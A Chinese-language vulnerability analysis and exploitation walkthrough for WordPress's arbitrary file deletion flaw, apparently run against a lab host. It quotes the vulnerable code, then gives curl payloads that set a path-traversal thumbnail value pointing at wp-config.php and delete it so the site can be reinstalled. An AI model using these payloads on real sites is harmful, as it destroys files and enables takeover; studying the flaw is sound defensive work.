漏洞分析

1.文件wp-includes/post.php中：

function wp_delete_attachment( $post_id, $force_delete = false ) {
    
    $meta = wp_get_attachment_metadata( $post_id );
    
    if ( ! empty($meta['thumb']) ) {
        // Don't delete the thumb if another attachment uses it.
        if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) {
            $thumbfile = str_replace(basename($file), $meta['thumb'], $file);
            /** This filter is documented in wp-includes/functions.php */
            $thumbfile = apply_filters( 'wp_delete_file', $thumbfile );
            @ unlink( path_join($uploadpath['basedir'], $thumbfile) );
        }
    }
   
}

$meta['thumb']来自与数据库，是图片的属性之一。代码未检查$meta['thumb']的内容，直接带入unlink函数，如果$meta['thumb']可控则可导致文件删除。

2.文件/wp-admin/post.php中：

switch($action) {

    case 'editattachment':
        check_admin_referer('update-post_' . $post_id);
        
        // Update the thumbnail filename
        $newmeta = wp_get_attachment_metadata( $post_id, true );
        $newmeta['thumb'] = $_POST['thumb'];

        wp_update_attachment_metadata( $post_id, $newmeta );

$newmeta['thumb']来自于$_POST['thumb']，未经过滤直接将其存入数据库，即上一步的$meta['thumb']可控。

详细分析可见：WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

漏洞利用

登录后台，添加媒体

访问 http://你的域名/wp-admin/upload.php, 上传任意图片.

将 $meta['thumb'] 设置为我们要删除的文件

3.1 点击第二步中我们上传的图片, 并记住图片ID.

3.2 访问 http://你的域名/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce.

发送Payload:

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

删除文件

4.1 在网页源码中找到另外一个 _wpnonce.

发送Payload:

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'

刷新网页

已经可以重装网站。